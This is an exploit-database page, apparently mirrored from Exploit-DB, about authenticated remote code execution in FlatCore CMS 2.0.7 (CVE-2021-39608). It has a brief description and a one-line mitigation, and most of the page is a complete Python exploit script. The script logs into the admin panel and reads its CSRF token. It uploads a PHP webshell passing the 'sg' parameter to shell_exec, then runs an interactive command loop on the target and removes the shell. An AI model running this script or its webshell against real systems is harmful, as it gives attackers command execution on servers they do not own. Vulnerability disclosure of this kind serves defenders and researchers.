header-logo
Suggest Exploit
vendor:
FlatCore CMS
by:
Mason Soroka-Gill
7.2
CVSS
HIGH
Remote Code Execution (RCE)
CWE
Product Name: FlatCore CMS
Affected Version From: 2.0.7
Affected Version To: 2.0.7
Patch Exists: NO
Related CWE: CVE-2021-39608
CPE: a:flatcore_cms:flatcore_cms:2.0.7
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu Server 21.04
2021

FlatCore CMS 2.0.7 – Remote Code Execution (RCE) (Authenticated)

This exploit allows an authenticated attacker to execute arbitrary code on a target system running FlatCore CMS version 2.0.7. The vulnerability exists in the 'files.upload-script.php' script, which allows an attacker to upload a malicious PHP file and execute arbitrary commands through the 'sg' parameter in the URL.

Mitigation:

Update to a patched version of FlatCore CMS.
Source

Exploit-DB raw data:

# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
#   - https://github.com/flatCore/flatCore-CMS/issues/52

#!/usr/bin/env python3

import sys
import requests
from lxml import html
from urllib.parse import urlencode

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
    exit(1)

TARGET   = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]

# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1",
        data={
            "login_name":f"{USERNAME}",
            "login_psw":f"{PASSWORD}",
            "login":"Anmelden"})

# grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]

# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
        headers={"Cookie":PHPSESSID})
if resp.status_code != 200:
    print("Invalid credentials")
    exit(1)
else:
    print("Logged in")

# grab the csrf token for the script upload
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value

# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
        data={"upload_type":"plugin", "csrf_token":csrf_token},                     # the csrf token
        files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")},   # the webshell
        headers={"Cookie":PHPSESSID})                                               # the php session id

# pretend to be a shell
while True:
    command = input("$ ")
    if command.lower() == "exit" or command.lower() == "q":
        break
    resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
    # verify payload succeeded
    if resp.status_code == 200:
        print(resp.text)
    else:
        print("Error: Something went wrong, maybe the shell didn't work?")
        break

# delete the webshell
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Cleaned up webshell")

# clean up the session
resp = requests.get(f"{TARGET}/index.php?goto=logout",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Logged out")

exit(0)

Navigation

Suggest Exploit

Services By CQR